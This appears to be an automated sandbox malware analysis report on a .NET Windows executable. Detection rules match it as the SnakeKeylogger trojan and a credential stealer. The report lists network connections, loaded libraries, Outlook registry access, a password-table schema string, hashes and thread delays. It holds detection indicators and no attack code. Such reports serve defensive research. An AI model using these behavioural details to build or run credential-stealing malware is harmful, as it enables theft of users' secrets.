                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: Lpjrd6Wxad.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Lpjrd6Wxad.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: Lpjrd6Wxad.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102C1470_2_0102C147
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102D2C80_2_0102D2C8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102D5990_2_0102D599
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102C46F0_2_0102C46F
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102C7380_2_0102C738
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_010269A00_2_010269A0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102CD280_2_0102CD28
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102EC180_2_0102EC18
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_01026FC80_2_01026FC8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102CFF70_2_0102CFF7
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_01023E120_2_01023E12
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_010253700_2_01025370
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102F4C70_2_0102F4C7
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102F4D00_2_0102F4D0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_010239CD0_2_010239CD
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0102EC0A0_2_0102EC0A
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058247A80_2_058247A8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058293F00_2_058293F0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_05828AA80_2_05828AA8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582D5800_2_0582D580
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582D5710_2_0582D571
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582FC980_2_0582FC98
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_05828CC80_2_05828CC8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582CCD00_2_0582CCD0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582C4200_2_0582C420
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582EF830_2_0582EF83
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058217880_2_05821788
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582EF900_2_0582EF90
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058217980_2_05821798
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582479C0_2_0582479C
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_05821E800_2_05821E80
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582E6D30_2_0582E6D3
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582E6E00_2_0582E6E0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582DE240_2_0582DE24
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582DE300_2_0582DE30
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_05821E720_2_05821E72
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582D9CB0_2_0582D9CB
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582D9D80_2_0582D9D8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582D1190_2_0582D119
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582D1280_2_0582D128
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058210AD0_2_058210AD
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058210B80_2_058210B8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582F8350_2_0582F835
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582003F0_2_0582003F
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058200400_2_05820040
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582F8400_2_0582F840
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582C8780_2_0582C878
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582F3D90_2_0582F3D9
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058293E30_2_058293E3
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582F3E80_2_0582F3E8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_058283200_2_05828320
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582EB290_2_0582EB29
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582EB380_2_0582EB38
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_0582E2880_2_0582E288
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4034472681.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Lpjrd6Wxad.exe
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4034420315.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Lpjrd6Wxad.exe
                          Source: Lpjrd6Wxad.exe, 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Lpjrd6Wxad.exe
                          Source: Lpjrd6Wxad.exeBinary or memory string: OriginalFilenameRemington.exe4 vs Lpjrd6Wxad.exe
                          Source: Lpjrd6Wxad.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Lpjrd6Wxad.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Lpjrd6Wxad.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: Lpjrd6Wxad.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Lpjrd6Wxad.exe, ---.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Lpjrd6Wxad.exe, ---.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Lpjrd6Wxad.exe, JA-.csCryptographic APIs: 'TransformFinalBlock'
                          Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@4/4
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeMutant created: NULL
                          Source: Lpjrd6Wxad.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Lpjrd6Wxad.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Lpjrd6Wxad.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Lpjrd6Wxad.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Lpjrd6Wxad.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_01029C30 push esp; retf 02C2h0_2_01029D55
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_01026FC8 push 5502C29Fh; retn 5502h0_2_01027536
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_01025D08 push dword ptr [ecx-75h]; iretd 0_2_01025D12
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 0_2_01022D49 push 8BFFFFFFh; retf 0_2_01022D4F
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599438Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599313Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599188Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 599078Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598969Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598844Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598734Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598609Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598499Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598340Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598191Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 598071Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597969Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597735Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeThread delayed: delay time: 595813Jump to behavior
